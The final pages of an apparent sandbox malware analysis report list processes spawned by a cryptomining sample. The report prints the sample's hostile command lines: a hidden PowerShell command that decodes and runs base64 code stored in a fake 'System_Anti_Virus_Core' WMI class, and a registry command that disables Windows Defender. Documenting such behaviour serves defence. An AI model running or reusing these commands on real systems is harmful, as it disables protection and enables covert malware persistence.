Start time: 05:26:27 Start date: 04/09/2018 Path: C:\Windows\System32\findstr.exe Wow64 process (32bit): false Commandline: 'C:\Windows\system32\findstr.exe' /i /m /c:cryptonight 'c:\program files\common files\microsoft shared\officesoftwareprotectionplatform\osppsvc.exe' Imagebase: 0x500000 File size: 62976 bytes MD5 hash: 18F02C555FBC9885DF9DB77754D6BB9B Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: powershell.exe PID: 2396 Parent PID: 3268

General

Start time: 05:26:28 Start date: 04/09/2018 Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Wow64 process (32bit): false

Copyright Joe Security LLC 2018 Page 49 of 50 Commandline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -NonI -W Hidden '$mon = ([WmiClass] 'root\default:System_Anti_Virus_Core').Properties['mon'].Value;$funs = ([WmiClass] 'root\default:System_Anti_Virus_Core').Properties['funs'].Value ;iex ([Syste m.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($funs)));Invoke- Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($mon, $mon, 'Void', 0, '', '')' Imagebase: 0x21e10000 File size: 452608 bytes MD5 hash: 92F44E405DB16AC55D97E3BFE3B132FA Has administrator privileges: true Programmed in: .Net C# or VB.NET

Analysis Process: NETSTAT.EXE PID: 2648 Parent PID: 3268

General

Start time: 05:27:08 Start date: 04/09/2018 Path: C:\Windows\System32\NETSTAT.EXE Wow64 process (32bit): false Commandline: 'C:\Windows\system32\NETSTAT.EXE' -anop tcp Imagebase: 0x370000 File size: 27136 bytes MD5 hash: 32297BB17E6EC700D0FC869F9ACAF561 Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: reg.exe PID: 2212 Parent PID: 2216

General

Start time: 05:27:13 Start date: 04/09/2018 Path: C:\Windows\System32\reg.exe Wow64 process (32bit): false Commandline: 'C:\Windows\system32\reg.exe' add 'HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microso ft\Windows Defender' /v DisableAntiSpyware /t REG_DWORD /d 1 /f Imagebase: 0xef0000 File size: 62464 bytes MD5 hash: D69A9ABBB0D795F21995C2F48C1EB560 Has administrator privileges: true Programmed in: C, C++ or other language

Disassembly

Code Analysis

Copyright Joe Security LLC 2018 Page 50 of 50